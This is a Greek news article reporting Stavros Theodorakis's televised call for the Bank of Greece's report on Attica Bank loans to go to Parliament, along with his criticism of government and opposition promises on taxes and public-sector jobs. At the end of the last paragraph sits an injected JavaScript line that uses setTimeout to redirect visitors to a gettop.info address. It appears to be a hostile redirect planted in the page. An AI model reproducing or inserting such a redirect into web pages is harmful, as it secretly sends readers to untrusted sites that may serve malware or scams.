Θεοδωράκης για τα βοσκοτόπια Καλογρίτσα: Να δοθεί στη Βουλή το πόρισμα για την Τράπεζα Αττικής

0
14

 

«Το πόρισμα για την τράπεζα Αττικής πρέπει να δοθεί στη Βουλή. Ακούγονται πολλά για το ρόλο τη τράπεζας Αττικής, η οποία μπορεί να παίζει σήμερα το ρόλο που έπαιζε μια άλλη τράπεζα στο παρελθόν, την εποχή του Κοσκωτά. Ζητάμε λοιπόν από τον κ. Στουρνάρα και την Τράπεζα της Ελλάδας να στείλει το πόρισμα στη Βουλή, να δούμε λοιπόν και ποιοι είναι οι φίλοι του νέου καθεστώτος που συνεχίζουν να παίρνουν θαλασσοδάνεια». Αυτή ήταν η τοποθέτηση του Σταύρου Θεοδωράκη στην τηλεόραση του ΣΚΑΪ όταν ρωτήθηκε για τα βοσκοτόπια του κ. Καλογρίτσα αλλά και τις πληροφορίες για την ενίσχυση συγκεκριμένων επιχειρηματιών από την Τράπεζα Αττικής.

Ερωτώμενος για τις υποσχέσεις του κ. Μητσοτάκη για μείωση των φόρων είπε «εμείς έχουμε πει πού μπορούν να βρεθεί το ένα δισ. που χρειαζόμαστε» και εξήγησε: «Έχουμε προτείνει να καταργηθούν τα πολιτικά γραφεία των υπουργών και των υφυπουργών ως δημόσιες υπηρεσίες. Ο κ. Τσοχατζόπουλος είναι αυτός που μετέτρεψε τα πολιτικά γραφεία σε δημόσιες υπηρεσίες γεγονός που επιτρέπει σε όλες τις κυβερνήσεις να στήνουν το κομματικό τους κράτος».

Στη συνέχεια ο κ. Θεοδωράκης σχολίασε τη διαβεβαίωση και του κ. Μητσοτάκη «ότι δεν θα φύγει κανείς από το δημόσιο», λέγοντας: «Εμείς δεν φοβόμαστε να πούμε ότι πρέπει να φύγουν από το δημόσιο αυτοί που δεν δουλεύουν. Ο κόσμος «χάνει» τα παιδιά του που φεύγουν στο εξωτερικό, επιχειρήσεις κλείνουν, ανεργία στα ύψη και δεν θα πειράξουμε την ιερή αγελάδα του δημοσίου; Οι σπατάλες περιλαμβάνουν και ανθρώπους που πληρώνει το δημόσιο και δεν δουλεύουν. Αυτό όμως δεν μπορούν να το διαχειριστούν εκείνοι που έχουν διορίσει το μισό δημόσιο, τα παλιά κόμματα, η ΝΔ, το ΠΑΣΟΚ και ο ΣΥΡΙΖΑ ο οποίος είναι άξιος συνεχιστής τους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here